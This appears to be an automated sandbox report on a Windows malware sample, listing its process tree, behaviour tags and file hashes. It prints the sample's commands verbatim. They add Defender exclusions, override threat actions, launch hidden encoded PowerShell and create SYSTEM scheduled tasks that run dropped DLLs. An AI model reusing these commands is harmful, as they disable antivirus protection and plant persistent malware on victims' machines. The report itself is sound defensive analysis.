C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:644⤵PID:2892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:324⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:644⤵PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:324⤵PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:644⤵PID:1912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:324⤵PID:1704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:644⤵PID:2272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:324⤵PID:1508
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:644⤵PID:2240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:324⤵PID:1796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:644⤵PID:2836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:2884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:3020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:324⤵PID:2760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:644⤵PID:2512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵PID:1424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵PID:2696
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gQLnDKZqI" /SC once /ST 00:08:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gQLnDKZqI"3⤵PID:1428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gQLnDKZqI"3⤵PID:2220
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1716
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2344
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1644
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1652
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WFVPvOFzrjCnPPlbL" /SC once /ST 00:02:30 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\hcLxuQy.exe\" 7d /XBTjdidfz 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WFVPvOFzrjCnPPlbL"3⤵PID:788
-
-
-
C:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\hcLxuQy.exeC:\Windows\Temp\mrYrpJCpOmktZWwz\vkQZSkunSJsHwFm\hcLxuQy.exe 7d /XBTjdidfz 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2728 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2692
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2708
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2112
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1816
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2944
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:924
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2700
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:1136
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2216
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:948
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1760
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1788
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:280
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2532
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2280
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1100
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "butYHpXTvMdZIJsEKZ"3⤵PID:2476
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:2988
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:1904
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:1704
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:1692
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\tffvHWJZU\oCdmkB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "oiGBDDjiIQmhwtu" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oiGBDDjiIQmhwtu2" /F /xml "C:\Program Files (x86)\tffvHWJZU\XlpYdbP.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "oiGBDDjiIQmhwtu"3⤵PID:2748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "oiGBDDjiIQmhwtu"3⤵PID:400
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mVOvxPujqogGhF" /F /xml "C:\Program Files (x86)\REeMUtPoCvFU2\fnRiKUr.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PuKixiXcCNlkt2" /F /xml "C:\ProgramData\NGysLhxJEZNwhMVB\lxuXctU.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2716
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PNkVCGbsoOwbzBvhS2" /F /xml "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\NXOWJiz.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OEjxyANCnYwFWrViDzJ2" /F /xml "C:\Program Files (x86)\kLpsRMujXEpbC\CRSZSVE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dSPsRFCNvoTMekFez" /SC once /ST 00:03:53 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mrYrpJCpOmktZWwz\xplIZKau\roCkyCB.dll\",#1 /afdidX 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "dSPsRFCNvoTMekFez"3⤵PID:2632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "WFVPvOFzrjCnPPlbL"3⤵PID:1344
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\xplIZKau\roCkyCB.dll",#1 /afdidX 5254032⤵PID:1748
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\mrYrpJCpOmktZWwz\xplIZKau\roCkyCB.dll",#1 /afdidX 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:760 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "dSPsRFCNvoTMekFez"4⤵PID:2820
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {6D35DD82-F185-4EC1-BF7E-7CC7182F93C9} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]1⤵PID:1856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:864
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2520
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2224
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2388
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:916
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53eb5064bf32f829258219f62c81b276b
SHA1f2e5a970ee7fa600611e3b5c4ff3607689695911
SHA2568c2a385900dee088cae5e063e82701f8fe1c41dcf402738a89a841c6636bf34e
SHA512ea6b36663a5fc46905448a352803e34d51793e0b84273269e3b92f3d1800c0a5c03044524707ac54aec3e4aa51a71cbbfb7ab49325c8f234b7868346c88743d2
-
Filesize
2KB
MD5a441f4abe7bd884d5e5885e745c74e9d
SHA15ddb2334416b348d8c535726bc43df4f1121c004
SHA256bb3d05807da81f8ec86f2f4b67ddeef6e4fe52f7fac801e8b24e8f97000446c2
SHA5127c8e86cbf13a033184bd030ffeadbaf266c1b3e3126818c22772746e553cdb056be03205109a533a25ba168623de4fd8f91a4429343f3df3d3bdaee945df4462
-
Filesize
2KB
MD5e7eee0cb27903f7b7d55b043beb12748
SHA1a39b7bda80dc3bc0858bbe88fa9ec84f876c7021
SHA256c5aa38154d24742485e912324ae19c894782cf6561cda8d28474cae15984fa83
SHA512e42679b4711340af774d4fdb29d7c04858438e3063ba9f7816914bcaa84c24dd75e4df435449f1a7e10f50b090feb952fc47fc79a098c64c6fbed4f7bcdf1661
-
Filesize
2KB
MD500c5ee4e0b0ed672c3f08f62197b0d72
SHA13efd894b5fc28ba424ac9eb31a76eb10bed3bb29
SHA2569c12d361fc4c8b23ddedc69bfc62c9c73e566d3f2f8df782831d20a8e47a3113
SHA512c5f1ffc59ae5a16d9b470cb4887ce8f46b7faf661e5a539efb584bb25d8c3eeebceff75d31ccdd114db39570a378d45ed756e7798723633ba27ffedc42dc8a47
-
Filesize
2.5MB
MD50a708b9cad5a0486a344084310c214a7
SHA15f665180ba2d938fdf56e563a842183dc8e7f8dd
SHA256b1586d3bb9bf207df13cab5acbc1cc3df7542bc3f9a8f060a8be0c88a01b450b
SHA512315b1c32e1781064d5e1bfed1fa35ebb303f810337ed9edae7178dcbc2b63ab434bb99f2d65277d3f55396a4a0fe1825ef579f905fba26822172b2a742cbafd2
-
Filesize
2KB
MD576f782950857acb3654cbc77f727442d
SHA13e90014cb8728ad63e775262d9d2fd08ac91a907
SHA2561c933d86e636e35ad4caebc591ca88355b6199a65db8165d86b8ca25bedd329b
SHA5127349adae2c2a2d5e403b3bc7a2c5645f7774836cd6cf8a214e13f3ebd2c9e3fc22953cff89238eccf309671b23992cc97e4ff115e9a72313f6d246c22f04281f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD58ca9e1dd6f23b67673b7ac43c1cccebf
SHA1c5b2ecf25ed20da279d94942ae8a29c1c87fb350
SHA2561f266329e93c66dd7821b0722aa6095e9b9103ab8249436a5485535490c42aea
SHA512bc210162f835dda6141d34bfd0d88a8254726d939a4b7971f617dff2c964e09952f8ef4d918a1c3c2dbdf34083f7ea9398af777e3a34e0777168c1218f90d092
-
Filesize
28KB
MD5a7c1ff172d47cc282d6bc970f4869e9d
SHA181ee196fc25f8fe3c25d5c3d988a9d2dc47b0bf5
SHA256f5141c7fee4e0fd86e7dcf4ef82486958697b0015430bd4330b6df909b19c64d
SHA512f92309d75919ce07bd9ea6a20065f656308b70725544d97a84eda963688f9fb632929fadd8c046a12f14b3ac45525d72157999c0a4d400e8c651f2b9e4a13702
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD572f66148633f95581f9694cb0135b43b
SHA1631106bb37a0302c5c1a633f0cdf831834ebc6a5
SHA256178bb05f26579f5ba128f6d04e16826bac8105cf35be7696627df16db8044755
SHA51206d2f1ecb15e8ac4d70e420f027828935c860d88822b3a66c283486a7f504a563497bd6dd4be4597a102bf99cfebcc6cdfff71d0a8561e68454ed991978b0ec5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f27827eec8e66f19e6c1ef23d8d4c0c9
SHA1fe2fa826e61dc79d8eeafe15ac7eead3f180a197
SHA256f29857662289044aee748a4d79bb4cc2e53f547a7bc68847ca7d26a4a7cd597f
SHA5128ffaf308a8851f624bdc69c7fe28164da13369f31342abaa4f71ee9ee4cbe1fd65a8ba08a4be201c4ec8b3a86c464888ac567bcaa43d5e639d6ffc9be5d2583c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD53e46c455e149d1cc4ed9d07f3591a1a1
SHA1ce110a46f53e264d963cbe9cb0ab3bf4d6fcd81e
SHA256390f152649f741ef53c37c5a70180931723c61ec662512ff36829048e1babf52
SHA5125ce57017d1bc32f4f2cc884fdd3fee159c68c710d534e8de89dbcd79bb9f9e99522c7d3ce6f856d84472881433f29b6364525593a2e7a2ef05a8607aa68bc606
-
Filesize
6KB
MD5ab98ec216e442886742405d6708a6392
SHA17b23ea1fc049be21b50d324ef0874fb8c8eb1217
SHA25641648c21be43af43bb3edc7a6e70e030d34f2c453f30065d1e5c341c08dd38a1
SHA512b7b298c5655483c1271f1706f177fde7672ab75e4261808cc3e97c528eef6c8cc7730ee36d5c5c6f0d17ffc0c936c555aa36cea68686e9c4aefcacbfe063fb7a
-
Filesize
9KB
MD57ebd700be1c46ac0286d616b1e1d996f
SHA1a13c60c8ce65bb091533fed4d30049b1cab1e344
SHA2562661b5f367bf641d2fffd6f306adfaccbc548b8db09684a5680062203d952111
SHA512ab3604936aff91ae88eef37bd7c6ebfaf09271574893b445ff651f5865a0c6d77cda1af95e4b1575eea4ac6f58f92743a9b20e44e5b274b46403b2c0e20cb6ae
-
Filesize
6.4MB
MD52ab490e0b4b1767a1780c820fea740f1
SHA181a97ba2e6b1b98d2597790f76d269e6c3d43449
SHA2563bcd6700c0f9f9bb1cd2ebd1a1808bdf6dc20c19bd514d050bce73da8d555f0f
SHA512d7d0c37702f68cecc4ad5a49afbf05bd8c638d65b85c959811bad7cec2399c53524bead1beb98c1139effa344dce342bc77a39fa041ce580c0f861ec2feb7843
-
Filesize
6KB
MD503944af2fb533e34fc8b7c667db87f6e
SHA15f5d1279d331dd991e3746c81c5a3a1ca8048512
SHA256957e9c63cf9807c73020a3e7c28be5d5bb40e98e6d6ef12a160a7a638dcb2783
SHA51262550c136ddbe329b33d7c4d562a24e4fba11311b6d5ad8d71314c40ef729485d8ca3f1221e60ed64a11f3bebac792a95d5c8c0dc33d533085bca0727d0c0bda
-
Filesize
6.2MB
MD5b5bf7cc6c719be90223dc07f2688456b
SHA18bba06f5f762ab22b17a0325dae1f66db573c33e
SHA2563876c068cc15a62cc6facd941c1ffee3686b8f3e29b0e5258f7d34a2d22fd8e0
SHA51232f8f211bc26d197941af64fddc8b02e147335f3b1cda63dad2169af5bcbbf9f0e3489567a82d5ce4b83593ec89b7c9ba1a12e10e1b33bb7ffbfc256eea752b1
-
Filesize
6.4MB
MD5f82b10ad392bbd43cbd81d1da4cdd6f5
SHA1f4adf6325e87456c49db780a7540a414717cf1f3
